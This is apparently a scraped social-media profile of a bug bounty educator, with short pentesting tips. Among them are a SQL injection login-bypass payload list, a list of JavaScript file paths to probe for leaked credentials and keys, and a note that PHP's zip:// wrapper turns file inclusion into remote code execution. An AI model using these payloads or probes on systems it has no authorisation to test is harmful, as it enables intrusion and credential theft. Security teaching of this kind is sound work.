Pinned
We've curated entire API Pentesting Series into a single, auto-updating Notion page.
• All existing parts
• Future parts added automatically
• One link to bookmark
Access the full library here: vulncure.com/api-pentest/ap…
Abhishek Meena 🏵️
3,475 posts
Abhishek Meena 🏵️
@aacle_
Building @Vulncure ⚡| Helping founders fix vulnerabilities before hackers find them. Talk to me about: Bug Bounties, LLM Security & React.👇 Book a 15-min Demo
Joined June 2017
- In short Basic Computer Networking - Notes #bugbounty #infosec Beginner should know in Infosec community See : 👇
- FREE LABS TO TEST YOUR PENTEST/CTF SKILLS Share with your network and friends. #cybersecurity #bugbounty #hacking #infosec #bugbountytips #ctf #pentesting 🧵 1/n
- 24 Javascript path files used to store sensitive information in Web Application 1. /js/config.js 2. /js/credentials.js 3. /js/secrets.js 4. /js/keys.js 5. /js/password.js 6. /js/api_keys.js 7. /js/auth_tokens.js 8. /js/access_tokens.js 9. /js/sessions.js 10. /js/authorization.js
- 🔰 { One-Liner } - Extract all URL from Source Code ➡️ curl "https://example .com/" | grep -oP '(https*://|www\.)[^ ]*' #bugbounty #Infosec
- Some of the major vulnerabilities and related POC’s: ➡SQLi ➡XSS ➡SSRF ➡XXE ➡Path Traversal ➡Open Redirection ➡Account Takeover ➡Remote code execution ➡IDOR ➡CSRF #hacking #bugbounty #bugbountytips Are Found Below🧵(1/n)👇
- FREE LABS TO TEST YOUR PENTEST/CTF SKILLS Share with your network and friends. #cybersecurity #bugbounty #hacking #infosec #bugbountytips #ctf #pentesting 🧵 1/n
- Login Bypass 🌵 #SQLi param=' param=" param=' or 1=1 param=' or 1=0 param=' and 1=1 ' or sleep(2) and 1=1# ' or sleep(2)# admin' and sleep(2)# ' union select sleep(2),null# ' union select sleep(2),null,null,null,null# #cybersecurity #hacking #bugbountytips #infosec 1/9 👇🏿✔
- My API Hacking Notes 🗒 #1 bugbountyguide.org/wp-content/upl…
- If a web application allow you to upload a .zip file, zip:// is an interesting PHP wrapper to turn a LFI into a RCE. #BugBounty #BugBountyTips #InfoSec
